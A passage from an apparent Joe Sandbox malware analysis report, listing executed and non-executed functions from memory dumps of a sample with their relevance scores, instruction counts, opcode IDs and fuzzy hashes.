                  Function 00007FF848F03170 Relevance: .2, Instructions: 164COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8560193c16d6024b45b5f7aaa0300d716e562fb0738417639a770dd979a43efc
                  • Instruction ID: 85283e6aee1eb9bb4070dc750075275facf109a9a36886ba1b3c4887a2a9bca2
                  • Opcode Fuzzy Hash: 8560193c16d6024b45b5f7aaa0300d716e562fb0738417639a770dd979a43efc
                  • Instruction Fuzzy Hash: CF519E30D1D64E8FE756AB7888592FA7BA0EF4A341F44057AD408D61D2FB38A548C715
                  Function 00007FF848F0273D Relevance: .1, Instructions: 145COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 196275804faa028fd225a5c5885e5ba80575817fd1ecfa5af70a611892bb7da5
                  • Instruction ID: 2d66ddca38d940616998f5d5fe238d0205b465ed2d75723058016e95e265f21e
                  • Opcode Fuzzy Hash: 196275804faa028fd225a5c5885e5ba80575817fd1ecfa5af70a611892bb7da5
                  • Instruction Fuzzy Hash: 82417F3085D78A8FEB56AF7488182A93FE0FF16341F4544BBD848C61D3EB38A558C721
                  Function 00007FF848F031E0 Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c61b7d94d9d57922e611e6b6be76ba9a2ba016974deff63dda718e3ee9e6f1a3
                  • Instruction ID: b13040078c5555225270c63375cad4b32d63ced2af17ff49106022a1cdad8010
                  • Opcode Fuzzy Hash: c61b7d94d9d57922e611e6b6be76ba9a2ba016974deff63dda718e3ee9e6f1a3
                  • Instruction Fuzzy Hash: A741AC30C1E64E8FEB52AB68C8592FE7BB0EF4A341F44057AD408D61D2EF38A548C725
                  Function 00007FF848F01240 Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 056c63c7da17c11e627527e6d40b472add2906a53058d62b459f6ee31b4da3dc
                  • Instruction ID: 5f433cb0fff627d1eb5e79e2359a316579e0814cd99aa21c353573e87f3e3d4a
                  • Opcode Fuzzy Hash: 056c63c7da17c11e627527e6d40b472add2906a53058d62b459f6ee31b4da3dc
                  • Instruction Fuzzy Hash: E431AE70D0DA8E8FEB58EF68C8196FA7BE0FF5A350F04017AD409D71D2EB24A8848751
                  Function 00007FF848F0AEFA Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 474fecfaa31d448d2247ab7afb2790c2b226f3a25ee663038af1e17b169d9cd2
                  • Instruction ID: fe4622e358da98e8179db92b9dca97314dfea6d5d6fe99fcc4354b71d8691810
                  • Opcode Fuzzy Hash: 474fecfaa31d448d2247ab7afb2790c2b226f3a25ee663038af1e17b169d9cd2
                  • Instruction Fuzzy Hash: 1831E4B1D0DA8A9FE741FB3858581E97BE0FF56352F0804BBC008CB1D2FB2858868755
                  Function 00007FF848F0290D Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d76c4a2b105e808ec2e9a6b4f82637a400b6af8d467e86e9cb23ba7d5df49f95
                  • Instruction ID: fb9f75cfa3471149ba057fdbe551b0db0982577acf606fde32fd1db031f6a59d
                  • Opcode Fuzzy Hash: d76c4a2b105e808ec2e9a6b4f82637a400b6af8d467e86e9cb23ba7d5df49f95
                  • Instruction Fuzzy Hash: A231D63290D2565FE742FBB8E8945EA3BB0EF46365F0942B7D048CA093EB3C90458765
                  Function 00007FF848F0C1E8 Relevance: .1, Instructions: 108COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2920793cfc409b2c3ec15b10a5e6db0c234e191934270c160ede3f304e7a97df
                  • Instruction ID: 6c89f7c7795b7e9a98cd20c2bcbda981c19347b9b6b7c6703163b54d3efba874
                  • Opcode Fuzzy Hash: 2920793cfc409b2c3ec15b10a5e6db0c234e191934270c160ede3f304e7a97df
                  • Instruction Fuzzy Hash: F931D335E1C91D9EEB94EB989895AFCB7B1FF6A340F501139D00DE3282EF2468429B44
                  Function 00007FF848F004F8 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43cd2bff448021a08d678a9a3266b97fd550410bb1c4cfbb38b0cb0d9a7075ec
                  • Instruction ID: 264a90953a3ab402d52f7b1ca6f79c36fb6eb58e65818b6d0537e9fd4faaee9e
                  • Opcode Fuzzy Hash: 43cd2bff448021a08d678a9a3266b97fd550410bb1c4cfbb38b0cb0d9a7075ec
                  • Instruction Fuzzy Hash: 6031953485D78E8FD75AAF7488182B93BE0FF16341F5404BBE809C61D2EB38A558D751
                  Function 00007FF848F02FB8 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d25a9efc42f5b859ec681b81aff35f9c835de337aaaefde892b881c398e8ece4
                  • Instruction ID: 5fa6f63fff5ac83684babbee18f68c4bd69e48213f75c83fe48bf356d1a319cc
                  • Opcode Fuzzy Hash: d25a9efc42f5b859ec681b81aff35f9c835de337aaaefde892b881c398e8ece4
                  • Instruction Fuzzy Hash: 91318130D0E24A8EEB12EBA888143FE7BE0EF16395F144475D405E61C2EB79A548CB65
                  Function 00007FF848F0C260 Relevance: .1, Instructions: 93COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2597fb035df9dd5a64d13f7b34378b70a010517b594246ad9007be321a662738
                  • Instruction ID: 9c221b62a910ed93b3ed5692a60827afac8dda521922da0208188d8d77122261
                  • Opcode Fuzzy Hash: 2597fb035df9dd5a64d13f7b34378b70a010517b594246ad9007be321a662738
                  • Instruction Fuzzy Hash: 9A21F830E1D91D8FDB94FBA89895AECB7B1FF5A340F50112AC00DE7282EF2568419744
                  Function 00007FF848F0C0CA Relevance: .1, Instructions: 93COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8659fa0e1aadfc7afefa08b69eabe33979056ade16c2d0532c864f2ae7903d3e
                  • Instruction ID: 7687e243ddca70d34e6f817b52dc462e51ed5aa69b3fbdf34061f6cb2001b6c2
                  • Opcode Fuzzy Hash: 8659fa0e1aadfc7afefa08b69eabe33979056ade16c2d0532c864f2ae7903d3e
                  • Instruction Fuzzy Hash: 7E313B3090E64E8EEB55AB6488552FE7BE0EF16341F0005BAD419D32D2EB789944CB95
                  Function 00007FF848F0B1ED Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 994ab06656af2f86369d5903d1840f03009262dfb9d3b1143b742f4755290e6b
                  • Instruction ID: cddbc467c259d853e33e10c3457d83ff717eda5b83a48fb2fefeeb9217f9ce37
                  • Opcode Fuzzy Hash: 994ab06656af2f86369d5903d1840f03009262dfb9d3b1143b742f4755290e6b
                  • Instruction Fuzzy Hash: 0B31F570D1952E9EEB94EF94C8847ECB6F1FF59340F1041BAD00DE2291EB7869848B58
                  Function 00007FF848F02458 Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41fef2f6f97f8e30d0aa9d463c34c29e8757d783863c2b4b8f2b456177d6c55d
                  • Instruction ID: 00b8751a005fb34dffedf7b1dd06272f1fe49e248467efaad6cc7c9d9f6ab3c9
                  • Opcode Fuzzy Hash: 41fef2f6f97f8e30d0aa9d463c34c29e8757d783863c2b4b8f2b456177d6c55d
                  • Instruction Fuzzy Hash: 37310470D0C5298EEBA5EB54C8557FDB2B0AF56340F4040BAD44DA62D2EF782A88CF18
                  Function 00007FF848F00A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ceb4ae7531b74af998b82191647614b331192d110645d790d56e4d5473b421d4
                  • Instruction ID: 3e3e6f2e7fbcca3a1b4b27e0ae501c07d0e4ab96275e823dcb7b0ffb81a9966e
                  • Opcode Fuzzy Hash: ceb4ae7531b74af998b82191647614b331192d110645d790d56e4d5473b421d4
                  • Instruction Fuzzy Hash: 49115830D0D54E9EE780FB68C8496BA7BA0FF9A385F4005B6D809D61D2EF38A5448754
                  Function 00007FF848F02838 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ac0d66c39e5e6d94d7879788bddc46919c3f6aac8b9fc2aacd4f74ab40ced6d
                  • Instruction ID: be57a86e1dc64056694f98611b4d4a7602135edcb601f0249251499ebeff3099
                  • Opcode Fuzzy Hash: 1ac0d66c39e5e6d94d7879788bddc46919c3f6aac8b9fc2aacd4f74ab40ced6d
                  • Instruction Fuzzy Hash: 5C11813485D78E8FEB5AAB7484181F93BA0FF46241F50047BE809C20D1EB385558C751
                  Function 00007FF848F005D8 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c2b64f230bde72b12f13471626cb3e1940daeb8b775f07cf2c7425c8f261356
                  • Instruction ID: ab96e36443e6ab90f9389bfa601eb3125c12d35887d6bf4f2b61a97cc02e0a65
                  • Opcode Fuzzy Hash: 0c2b64f230bde72b12f13471626cb3e1940daeb8b775f07cf2c7425c8f261356
                  • Instruction Fuzzy Hash: D611CE3080EA4E8FDB59EF2484696B97BE1FF1A340F1044BEE409C30D2EB35A585C744
                  Function 00007FF848F00608 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3671992d9550e08b733661e1427462f0de4042cb1099b513d42a3c31c00f4f65
                  • Instruction ID: 303d5ff18be70b7a5b4559acc9137ee710e5ea8ac8b00e6e45e87bf536e3e14a
                  • Opcode Fuzzy Hash: 3671992d9550e08b733661e1427462f0de4042cb1099b513d42a3c31c00f4f65
                  • Instruction Fuzzy Hash: 87118C3485E78E9FEB5AAB7484082BA77E4FF06345F50087BE819C20D2EF38A558D751
                  Function 00007FF848F0AEC8 Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07b8d5ad4392c31e35c699956fdc256ba516388da0e9d1e9194d159c1f3ae1cc
                  • Instruction ID: a0c9744ecd5069123d6d8ec6de17fed80a2247186818a7ec96cc17896db5280c
                  • Opcode Fuzzy Hash: 07b8d5ad4392c31e35c699956fdc256ba516388da0e9d1e9194d159c1f3ae1cc
                  • Instruction Fuzzy Hash: 4D118F3090E68D4FEB45EB6488692BA7BF0FF1A301F1004BBD409C70D2EB346585C705
                  Function 00007FF848F0BE0E Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction ID: e22e982972602e29607d5bfc399560a8d7e76e9f9bdf249856d777e4ec8590ac
                  • Opcode Fuzzy Hash: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction Fuzzy Hash: 6311C570D1850ACFDB54EF94D484AEDB7F2EF59350F20452AE419A62D1EB3868908B44
                  Function 00007FF848F00610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9f1e1d1e8832e0574aab6dd43930e0d5f0219f8477ae549b9d21637ddf49bb0
                  • Instruction ID: e99e19425bc0ff51f0fac5202762d57bdb14ed371c897cbd83fcbd3410f38aae
                  • Opcode Fuzzy Hash: b9f1e1d1e8832e0574aab6dd43930e0d5f0219f8477ae549b9d21637ddf49bb0
                  • Instruction Fuzzy Hash: C101AD3481860E9EEB4AEB6484086BA77E0FF19345F20047FD80EC21D1EF35A594C720
                  Function 00007FF848F0BE7A Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction ID: d8232beb7212df2157eb4c5f4da9b388c77737c7f385db8797068b7092e3edd4
                  • Opcode Fuzzy Hash: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction Fuzzy Hash: AF019070D1C10ACFDB18EF94D490AFDB7F2EF59350F20452AE409A22D1EB386990CB98
                  Function 00007FF848F00F8E Relevance: .0, Instructions: 26COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c8c4934b52414eddc808ee5256e867a16234724ee57fc9c836f1f3fd15280186
                  • Instruction ID: 33256775404b84db2e883b8676ced20b3bd58444c08324abab794ddda04f3a25
                  • Opcode Fuzzy Hash: c8c4934b52414eddc808ee5256e867a16234724ee57fc9c836f1f3fd15280186
                  • Instruction Fuzzy Hash: 50F03A30A0A4198FEB50EB14C884BEEB7B1EB94345F1042A5C409A3285DE396E848B88
                  Function 00007FF848F0242D Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c539568c11bee4f2b750d98eafb16e1b332a74ccc819912ebd87da1ebc4a976
                  • Instruction ID: e1dce635e0ff675f26569e857a6d6314a1830cb0c5a64790cf607449c2b3dbb6
                  • Opcode Fuzzy Hash: 4c539568c11bee4f2b750d98eafb16e1b332a74ccc819912ebd87da1ebc4a976
                  • Instruction Fuzzy Hash: 51F0AC30908519CFEB95FB00CC54BE973A1FB95354F5085A9C44ED71A1EE7869888B58
                  Function 00007FF848F086C8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: 1e8b819e1b67b06311d0fb9531a27febb5c6c575d713ff5af183dc8a3f160afb
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 59E0C9B0E1C91ECEEBA5EB0489407A8B6B1BB56344F2040F9820DE61D0EB342AC18F08
                  Function 00007FF848F0BEAF Relevance: .0, Instructions: 19COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6135594a851a3d67b619c4c53d5e1d354b2e28bfb64a927bbc2f8d9f247ab74f
                  • Instruction ID: 07ada39ead5ff49ba8d57093d6e70542f6bdd2f4b496fdd8ad36e00915415d0c
                  • Opcode Fuzzy Hash: 6135594a851a3d67b619c4c53d5e1d354b2e28bfb64a927bbc2f8d9f247ab74f
                  • Instruction Fuzzy Hash: 8ED04235A1892DCFDF50EB98D8815EDB3B4FB59351F400126D51DD7181DB6468118B40
                  Function 00007FF848F07497 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: 02c7bc0c740cf215f214ec4969050d6716b034dac867b05d63e302419e9e293c
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 4EE04CB0D1C91D8EDBA5EB048950BA8B7B1FB55344F1081F9820DE7280EB346AC19F18

                  Non-executed Functions

                  Function 00007FF848F0ACED Relevance: .3, Instructions: 336COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae5d643b848a4cbb81e5bc234193d09b5f8dc4c79009b84118a098f8e116a996
                  • Instruction ID: 123f6acb6abf350440dcae412acc1cf77642d3e74ceff8f09b81d3d0627fb352
                  • Opcode Fuzzy Hash: ae5d643b848a4cbb81e5bc234193d09b5f8dc4c79009b84118a098f8e116a996
                  • Instruction Fuzzy Hash: FDB18B3090D65E8FEB99EF64C8596BA7BE1FF99351F0004BAD80AD71D2DB346944CB80

                  Executed Functions

                  Function 00007FF848F4AE60 Relevance: 2.3, Strings: 1, Instructions: 1036COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: cx\I
                  • API String ID: 0-1262179701
                  • Opcode ID: 28ec827474f15f3e5103502fe9f924d35dbf502bc3d64579b854a3f95d33dabb
                  • Instruction ID: 02f6f61f1a8773c08b129d6471d490046e159dc97e80a48038412ca1972735cd
                  • Opcode Fuzzy Hash: 28ec827474f15f3e5103502fe9f924d35dbf502bc3d64579b854a3f95d33dabb
                  • Instruction Fuzzy Hash: 5472CC3190D68A8FEB45EB2888596FA7BF0FF29351F1405BBD009C71E2EB38A844C755
                  Function 00007FF848F434AC Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: V_H
                  • API String ID: 0-105569101
                  • Opcode ID: f4b58ab974f2d6172a023646d90fc344dd4bdd589dc0c9e267dd3d762ab46177
                  • Instruction ID: 391850bf0bdc1c5f8dad599f02df32897be2d5b9ad55a7a09865455bbe61f82f
                  • Opcode Fuzzy Hash: f4b58ab974f2d6172a023646d90fc344dd4bdd589dc0c9e267dd3d762ab46177
                  • Instruction Fuzzy Hash: 7AF1DE7190DA8E8FEB49EB688859BA9BFF1FF59340F5401BAC009D72D2DB786445CB01
                  Function 00007FF848F49D61 Relevance: 1.2, Instructions: 1207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7b3498c7697e49a6339a217f52c16eeefcd8b61b98b2e5c620c8125117c46ab6
                  • Instruction ID: b082c0417b08c6563a4ced1b74cba22f4c1228e2dc0013eaadabd0071fe966d0
                  • Opcode Fuzzy Hash: 7b3498c7697e49a6339a217f52c16eeefcd8b61b98b2e5c620c8125117c46ab6
                  • Instruction Fuzzy Hash: 09929E3090D6898FDB46EF2488696A97FF0FF2A301F0545EBD449D71A2EB38A585C711
                  Function 00007FF848F4AD25 Relevance: .4, Instructions: 384COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c8081d64b3b29e341bb88f6aac0a642fc5de5731bd7e4e5c5887c5fb91f326f
                  • Instruction ID: 884fdc0bc45de50d72e98fe0c46b7ca89d2f3a371f7848dec21f0aa573fe932c
                  • Opcode Fuzzy Hash: 6c8081d64b3b29e341bb88f6aac0a642fc5de5731bd7e4e5c5887c5fb91f326f
                  • Instruction Fuzzy Hash: 0DD19E3090D68A8FEB95EF2488592FABBE0FF55345F0405BBD809C71D2DB38AA54C785
                  Function 00007FF848F4A87D Relevance: .4, Instructions: 375COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd8fe3f6aa6a14fcd34450729fa41a81b49c3bc24ca06cdc4cc5ef6edf8b193e
                  • Instruction ID: 5c8459eec4c0fd5098c0b0ca54b8945c4f9ecb7967e3669af42bd97248b103cc
                  • Opcode Fuzzy Hash: cd8fe3f6aa6a14fcd34450729fa41a81b49c3bc24ca06cdc4cc5ef6edf8b193e
                  • Instruction Fuzzy Hash: 91C1BD3090D68A9FE746EB2888986F97BF0FF29344F0545BBD409D70D2EB39A588C715
                  Function 00007FF848F40A01 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
